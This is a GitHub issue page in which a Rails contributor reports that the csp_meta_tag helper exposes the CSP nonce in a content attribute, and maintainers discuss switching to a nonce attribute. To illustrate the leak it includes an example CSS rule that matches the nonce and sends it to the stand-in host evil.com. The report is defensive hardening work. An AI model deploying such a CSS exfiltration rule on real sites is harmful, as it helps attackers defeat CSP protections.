You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Previously reported via Hackerone, reference #2432937 - Was asked by @tenderlove to create an issue here.
@tvongaza thanks for reporting this! I'm also not clear on how one would go about exploiting / using this information. However, I definitely agree we should fix the attribute name in the meta tag. Would you mind filing an issue in the public tracker, and we can fix it there?
Thank you!
Steps to reproduce
The rails csp_meta_tag helper generates meta tag with a content attribute which in theory can have it's nonce value exfiltrated.
While I'm not too sure how this type of attack vector could be exploited, or used (have no working exploit), there seems to be ways to curb it via using the nonce attribute instead of the content attribute for the nonce value, which in most browser has nonce hiding behaviour.
Example, if we instead generated a meta tag like this:
It the following would no longer work, as the only way to access the nonce value is via element.nonce property.
/* this fails, as in css nonce will always return an empty string */meta[nonce~="f7505009ff5f468269b583653293acb5"] {
background:url("https://evil.com/nonce?f7505009ff5f468269b583653293acb5");
}
document.querySelector('meta[name="csp-nonce"]').getAttribute("nonce");// returns an empty stringdocument.querySelector('meta[name="csp-nonce"]').nonce;// returns "f7505009ff5f468269b583653293acb5"
Low, not too sure what sort of attack vectors this achieves - others more familiar in this space may be more aware. However if there is an opportunity to have defence in depth we should take it.
Expected behavior
Nonce value exfiltration should be protected against.
Actual behavior
Nonce value exfiltration is possible.
System configuration
Rails version: HEAD as of April 16, 2024 (commit 1428ef9)
Ruby version: 3.3
The text was updated successfully, but these errors were encountered:
I think we should make this change, but I'm not sure what the impact is on existing JS libraries. We're going to have to coordinate fixing Rails along with the corresponding JS libraries. If someone wants to handle that work, I'd really appreciate it!
On the rails side, I wonder if it would make sense to add a depreciation warning for csp_meta_tag and introduce a csp_nonce_meta_tag with the new behaviour. This would allow for a more graceful upgrade path.
I can take a shot at some PRs, I think the JS libraries can be made backwards compatible by looking for both nonce & content prior to the rails change.
Question: How are the JS files updated which are included in the Rails source? IE should I make PRs against both Trix & Rails for the change, or would just against the Trix repo be enough & the changes will be applied to the rails Trix asset at some point?
Previously reported via Hackerone, reference #2432937 - Was asked by @tenderlove to create an issue here.
Steps to reproduce
The rails csp_meta_tag helper generates meta tag with a
content
attribute which in theory can have it's nonce value exfiltrated.Example:
Generates:
Which an attacker could access via carefully crafted css such as:
While I'm not too sure how this type of attack vector could be exploited, or used (have no working exploit), there seems to be ways to curb it via using the
nonce
attribute instead of thecontent
attribute for the nonce value, which in most browser has nonce hiding behaviour.Example, if we instead generated a meta tag like this:
It the following would no longer work, as the only way to access the nonce value is via
element.nonce
property.More information:
whatwg/html#2369
https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/nonce#accessing_nonces_and_nonce_hiding
Note this would be a breaking change for libraries making use of the
csp_meta_tag
's content attributes. Examples include (but not limited to):Impact
Low, not too sure what sort of attack vectors this achieves - others more familiar in this space may be more aware. However if there is an opportunity to have defence in depth we should take it.
Expected behavior
Nonce value exfiltration should be protected against.
Actual behavior
Nonce value exfiltration is possible.
System configuration
Rails version: HEAD as of April 16, 2024 (commit 1428ef9)
Ruby version: 3.3
The text was updated successfully, but these errors were encountered: